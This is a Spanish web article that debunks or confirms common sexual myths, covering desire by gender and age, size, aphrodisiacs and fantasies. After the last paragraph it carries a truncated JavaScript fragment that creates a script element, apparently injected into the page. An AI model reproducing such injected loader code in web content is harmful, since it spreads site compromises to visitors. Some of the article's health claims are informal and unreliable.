Salud y belleza » Salud sexual

Derribando mitos

Sin Comentarios

Los mitos, los reales, los falsos, tienden a moverse más rápido que cualquier información. De tal modo, es necesario aclarar ciertos comentarios –al fin y al cabo no son más que eso- en el momento justo para evitar problemas serios.
Pues, en la sexualidad: la desinformación siempre se vuelve un motivo de problemas.

Los hombres tiene mayor necesidad sexual que las mujeres: falso.

No importa el género, tanto hombres como mujeres, variando el caso, tienen la misma necesidad de mantener relaciones sexuales. La cultura popular indica que, a menudo, el género masculino exterioriza sus ganas con mayor énfasis, pero solo se trata de una tendencia.

Pasados los cincuenta, la vida sexual ya no es importante: falso.

El deseo sexual nada tiene que ver con la edad. Si bien el mismo puede llegar a disminuir por una serie de factores físicos dados por la edad, las ganas, no necesariamente tienen que claudicar. Un hombre adulto, entrado en años pero sano, puede mantener tantas relaciones como un adolescente.

El tamaño importa: verdad.

En efecto, el tamaño importa pero, en contra de lo que piensan muchos individuos, es más relevante el grosor que el largo. Por otra parte, en relación con el pensamiento femenino, según encuestas realizadas, el tamaño es más trascendente para los mismos hombres y su ego, que para las mujeres y sus necesidades de placer.

Ciertas comidas pueden aumentar el deseo sexual: falso.

Los afrodisíacos son solo un mito y, de momento, no hay prueba científica que sostenga la supuesta efectividad de estas comidas a la hora de tener sexo. La sensualidad nada tiene que ver con la gastronomía y, en ocasiones, lo importante de los restaurantes que se promocionan como “afrodisíacos”, radica en el clima que se crea allí y no en los alimentos.

Fantasear con alguien más es malo: falso.

¿Quién os ha puesto esta idea en el cerebro? ¿La Iglesia? Las fantasías sexuales, por raras que sean, nada tienen de malo. Al menos mientras se mantengan como fantasías (por supuesto que engañar a una pareja en cuerpo y alma está mal, pero si solo se trata de una invención de la imaginación es otra cosa). El cerebro es, sin dudas, el órgano sexual más potente, por lo tanto una buena sexualidad viene acompañada de un cerebro con “libre albedrío”.var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.